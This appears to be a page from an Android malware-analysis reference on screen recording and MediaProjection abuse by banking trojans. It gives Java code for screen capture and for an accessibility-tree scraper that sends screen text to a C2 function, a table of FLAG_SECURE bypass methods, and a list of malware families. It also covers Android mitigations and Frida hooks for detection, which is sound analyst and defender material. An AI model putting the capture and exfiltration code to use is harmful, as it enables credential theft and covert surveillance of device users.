Screen Recording & MediaProjection Abuse¶
Capturing the victim's screen in real time to steal credentials, monitor activity, or enable remote device control. Unlike overlay attacks that present fake UI, screen capture techniques passively observe the real UI -- the victim interacts with their actual banking app while the attacker watches or records every frame.
See also: Camera & Mic Surveillance, Notification Suppression
Requirements
| Requirement | Details |
|---|---|
| Permission | FOREGROUND_SERVICE + FOREGROUND_SERVICE_MEDIA_PROJECTION (Android 10+), or BIND_ACCESSIBILITY_SERVICE |
| User Interaction | MediaProjection consent dialog (one-time tap), or accessibility service enablement |
| Infrastructure | C2 server or WebSocket endpoint for live streaming |
Techniques¶
MediaProjection API¶
The primary screen recording mechanism since Android 5.0. The android.media.projection.MediaProjection class creates a virtual display that mirrors the device screen. The attacker obtains a MediaProjection token through MediaProjectionManager.createScreenCaptureIntent(), which triggers a system consent dialog.
MediaProjection Setup and Virtual Display Creation
MediaProjectionManager projectionManager =
(MediaProjectionManager) getSystemService(MEDIA_PROJECTION_SERVICE);
Intent captureIntent = projectionManager.createScreenCaptureIntent();
startActivityForResult(captureIntent, REQUEST_CODE);
On receiving the result:
@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
MediaProjection projection = projectionManager.getMediaProjection(resultCode, data);
VirtualDisplay display = projection.createVirtualDisplay(
"capture",
screenWidth, screenHeight, screenDensity,
DisplayManager.VIRTUAL_DISPLAY_FLAG_AUTO_MIRROR,
surface, null, null
);
}
The Surface target can be an ImageReader for screenshots, a MediaRecorder for video files, or a MediaCodec encoder feeding frames to a network socket for live streaming.
Malware typically wraps this in a foreground service to maintain the projection while backgrounded. The encoded frames (H.264 or MJPEG) stream to C2 over WebSocket or a custom TCP protocol.
Accessibility-Based Screen Reading¶
An alternative that requires no MediaProjection consent. The accessibility service traverses the AccessibilityNodeInfo tree to extract all visible text from the current screen.
Accessibility Tree Traversal for Screen Reading
@Override
public void onAccessibilityEvent(AccessibilityEvent event) {
AccessibilityNodeInfo root = getRootInActiveWindow();
if (root == null) return;
extractNodes(root);
}
private void extractNodes(AccessibilityNodeInfo node) {
if (node.getText() != null) {
sendToC2(node.getClassName().toString(), node.getText().toString());
}
for (int i = 0; i < node.getChildCount(); i++) {
AccessibilityNodeInfo child = node.getChild(i);
if (child != null) {
extractNodes(child);
child.recycle();
}
}
node.recycle();
}
This captures text content but not visual layout, images, or rendered WebView content. For banking trojans targeting specific fields, it is often sufficient -- account balances, transaction details, and form field values are all accessible as text nodes.
VNC / Remote Access¶
Several banking trojan families implement full VNC-like remote access by combining screen capture with input injection. The attacker views the victim's screen in real time and sends touch/gesture commands back to the device.
| Component | Implementation |
|---|---|
| Screen capture | MediaProjection frames encoded as H.264/VP8 |
| Input injection | Accessibility dispatchGesture() or performAction() |
| Protocol | Custom binary over WebSocket, or adapted VNC RFB protocol |
| Latency | Typically 200-500ms round trip |
This gives the attacker full interactive control of the device, enabling manual fraud operations where the attacker logs into the banking app, navigates menus, and initiates transfers while watching the screen.
Screen Streaming to C2¶
The real-time streaming pipeline used by most families:
- MediaProjection or
ImageReadercaptures frames - Frames encoded via
MediaCodec(hardware H.264) or downscaled to JPEG - Encoded data pushed over WebSocket or raw TCP to C2
- C2 panel renders the stream, optionally with touch input relay
Frame rate is typically throttled to 1-5 FPS to reduce bandwidth. Some families (Octo, Vultur) use adaptive quality -- higher FPS during active interaction, dropping to periodic screenshots when the screen is idle.
FLAG_SECURE Bypass Attempts¶
Apps can set FLAG_SECURE on their windows to prevent screenshots and screen recording. When active, MediaProjection captures black frames for that window.
| Bypass Method | How It Works | Effectiveness |
|---|---|---|
| Accessibility tree reading | Ignores FLAG_SECURE entirely since it reads node text, not pixels | Full bypass for text content |
| Root + framebuffer access | Reads /dev/graphics/fb0 directly |
Requires root, works on older kernels |
| Root + SurfaceFlinger | screencap via adb shell with elevated privileges |
Requires root |
| Xposed/LSPosed hooks | Hook Window.setFlags() to strip FLAG_SECURE |
Requires Xposed framework |
| Virtual display tricks | Some older Android versions didn't enforce FLAG_SECURE on virtual displays | Patched in Android 12+ |
Most malware relies on accessibility tree reading as the FLAG_SECURE bypass since it requires no root and works across all Android versions. The pixel-level bypasses are limited to rooted devices or exploit chains.
Android Mitigations¶
| Version | Change | Impact on Malware |
|---|---|---|
| Android 5.0 | MediaProjection API introduced | Screen recording possible without root |
| Android 5.0-9 | Consent dialog, no ongoing indicator | Malware shows dialog once, records indefinitely |
| Android 10 | FOREGROUND_SERVICE_MEDIA_PROJECTION type required |
Must declare foreground service type in manifest |
| Android 10 | Persistent notification required for media projection | User sees ongoing notification (malware disguises it) |
| Android 11 | MediaProjection token no longer reusable across app restarts | Must re-trigger consent after process death |
| Android 12 | StatusBar indicator for active screen sharing | User may notice colored dot indicator |
| Android 14 | Consent dialog shown before each capture session | Breaks single-consent-then-record-forever pattern |
| Android 14 | onCapturedContentVisibilityChanged() callback |
Apps can detect when they are being captured |
| Android 15 | Screenshot detection API (Activity.ScreenCaptureCallback) |
Target apps can respond to capture events |
Android Version Trend
Each version makes MediaProjection harder to abuse silently. This pushes malware toward accessibility-based screen reading, which remains unaffected by these mitigations.
Families Using This Technique¶
| Family | Method | Details |
|---|---|---|
| Hook | VNC via accessibility | Full remote access with touch relay, streams accessibility tree state to attacker panel |
| Octo | MediaProjection + accessibility | Live screen streaming at adaptive FPS, combined with accessibility for input injection |
| BRATA | MediaProjection recording | Records screen to local storage, exfiltrates video files to C2 |
| SpyNote | MediaProjection live stream | Real-time screen sharing with bidirectional control, RAT-style remote access |
| Vultur | MediaProjection via AlphaVNC/ngrok | Screen recording streamed through ngrok tunnels, later versions switched to custom protocol |
| TrickMo | Accessibility screen capture | Captures screen content via accessibility tree traversal, targets banking app fields |
| Medusa | MediaProjection + VNC | Live streaming with remote control capabilities |
| BingoMod | VNC via MediaProjection | Screen-based VNC for on-device fraud |
| Brokewell | MediaProjection streaming | Real-time screen mirroring to attacker |
| Gigabud | MediaProjection | Screen recording triggered via accessibility, avoids overlay attacks entirely |
Detection During Analysis¶
Static Indicators
FOREGROUND_SERVICE_MEDIA_PROJECTIONinAndroidManifest.xmlMediaProjectionManagerorcreateScreenCaptureIntentin decompiled codeVirtualDisplay,ImageReader, orMediaCodecusageAccessibilityNodeInfotree traversal with data exfiltration- WebSocket or raw socket connections combined with media encoding classes
Frida: Hook MediaProjection Creation
Java.perform(function() {
var MediaProjectionManager = Java.use("android.media.projection.MediaProjectionManager");
MediaProjectionManager.createScreenCaptureIntent.implementation = function() {
console.log("[*] MediaProjection capture intent created");
console.log(Java.use("android.util.Log").getStackTraceString(
Java.use("java.lang.Exception").$new()
));
return this.createScreenCaptureIntent();
};
var MediaProjection = Java.use("android.media.projection.MediaProjection");
MediaProjection.createVirtualDisplay.overload(
"java.lang.String", "int", "int", "int", "int",
"android.view.Surface", "android.hardware.display.VirtualDisplay$Callback",
"android.os.Handler"
).implementation = function(name, w, h, dpi, flags, surface, cb, handler) {
console.log("[*] VirtualDisplay created: " + name + " (" + w + "x" + h + ")");
return this.createVirtualDisplay(name, w, h, dpi, flags, surface, cb, handler);
};
});
Frida: Monitor Accessibility Tree Traversal
Java.perform(function() {
var AccessibilityNodeInfo = Java.use("android.view.accessibility.AccessibilityNodeInfo");
AccessibilityNodeInfo.getText.implementation = function() {
var text = this.getText();
if (text != null) {
console.log("[*] AccessibilityNodeInfo.getText(): " + text.toString());
}
return text;
};
});
Dynamic Indicators
- Foreground service notification appearing after accessibility enablement
- High CPU usage from
MediaCodecencoding - Sustained outbound data stream (WebSocket or TCP) with consistent bandwidth
VirtualDisplayinstance visible indumpsys display- Accessibility service with
flagRetrieveInteractiveWindowsandflagRequestFilterKeyEvents
Relationship to Other Techniques¶
Screen capture is often combined with other attack techniques:
- Accessibility abuse provides the input injection needed for full remote access
- Overlay attacks are sometimes replaced entirely by screen capture (the attacker watches the victim use the real app)
- Keylogging captures the same credential data through input events rather than visual observation